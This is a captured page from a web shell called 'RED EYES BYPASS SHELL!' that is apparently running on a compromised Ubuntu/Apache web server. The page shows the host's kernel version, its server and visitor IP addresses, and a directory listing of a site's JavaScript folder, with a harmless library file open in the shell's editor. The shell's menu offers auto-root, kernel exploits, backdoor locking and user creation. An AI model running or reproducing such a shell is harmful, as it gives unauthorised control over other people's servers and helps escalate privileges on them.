Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
commert /
accout /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
autocomplete.js
8.04
KB
-rwxr-xr-x
calendar.js
16.46
KB
-rwxr-xr-x
clock.js
2.76
KB
-rwxr-xr-x
common.js
22.6
KB
-rwxr-xr-x
datalist.js
8.23
KB
-rwxr-xr-x
ddmenu.js
7.72
KB
-rwxr-xr-x
ddpanel.js
2.1
KB
-rwxr-xr-x
dragdrop.js
2.62
KB
-rwxr-xr-x
editinplace.js
2.8
KB
-rwxr-xr-x
facebook.js
2.14
KB
-rwxr-xr-x
gajax.js
139.73
KB
-rwxr-xr-x
gbanner.js
7.88
KB
-rwxr-xr-x
google.js
1.9
KB
-rwxr-xr-x
graphs.js
36.78
KB
-rwxr-xr-x
inputgroup.js
3.37
KB
-rwxr-xr-x
loader.js
5.9
KB
-rwxr-xr-x
multiselect.js
2.61
KB
-rwxr-xr-x
pdpa.js
1.73
KB
-rwxr-xr-x
range.js
9.47
KB
-rwxr-xr-x
select.js
8.28
KB
-rwxr-xr-x
spline.js
5.58
KB
-rwxr-xr-x
table.js
19.77
KB
-rwxr-xr-x
uploads.js
11.4
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : editinplace.js
/** * EditInPlace * Ajax in-place editor * * @filesource js/editinplace.js * @link https://www.kotchasan.com/ * @copyright 2016 Goragod.com * @license https://www.kotchasan.com/license/ */ (function() { "use strict"; window.EditInPlace = GClass.create(); EditInPlace.prototype = { initialize: function(e, o) { this.className = "editinplace"; this.editing = function() { return ( '<input type="text" value="' + (this.value ? this.value : this.innerHTML) + '" />' ); }; for (var p in o) { this[p] = o[p]; } this.src = $G(e); this.src.style.cursor = "pointer"; this.src.tabIndex = 0; this.src.addClass(this.className); this.src.addEvent("click", this.Edit.bind(this)); var self = this; this.src.addEvent("keydown", function(e) { var key = GEvent.keyCode(e); if (key == 13 || key == 32) { self.Edit.call(self); GEvent.stop(e); return false; } return true; }); }, Edit: function() { var e = this.editing.call(this.src); if (e !== "" && e !== null) { e = e.toDOM().firstChild; this.src.parentNode.insertBefore(e, this.src); this.editor = $G(e); this.editor.addEvent("blur", this._saveEdit.bind(this)); this.editor.addEvent("keypress", this._checkKey.bind(this)); this.editor.addEvent("keydown", this._checkKey.bind(this)); this.oldDisplay = this.src.style.display; this.src.style.display = "none"; this.editor.focus(); if (this.editor.select) { this.editor.select(); } } return this; }, select: function() { this.editor.select(); }, cancelEdit: function() { this.src.style.display = this.oldDisplay; this.editor.removeEvent("blur", this._saveEdit.bind(this)); this.editor.removeEvent("keypress", this._checkKey.bind(this)); this.editor.removeEvent("keydown", this._checkKey.bind(this)); this.editor.remove(); this.src.focus(); return this; }, _saveEdit: function() { var ret = true, v = this.editor.value ? this.editor.value : this.editor.innerHTML; if (Object.isFunction(this.onSave)) { ret = this.onSave.call(this.src, v, this.editor); } else { this.src.setValue(v); } if (ret) { this.cancelEdit(); } }, _checkKey: function(e) { var key = GEvent.keyCode(e); if (key == 27) { this.cancelEdit(); GEvent.stop(e); return false; } else if (key == 13) { if (this.editor.tagName.toLowerCase() != "textarea") { this._saveEdit(); } GEvent.stop(e); return false; } return true; } }; })();
Close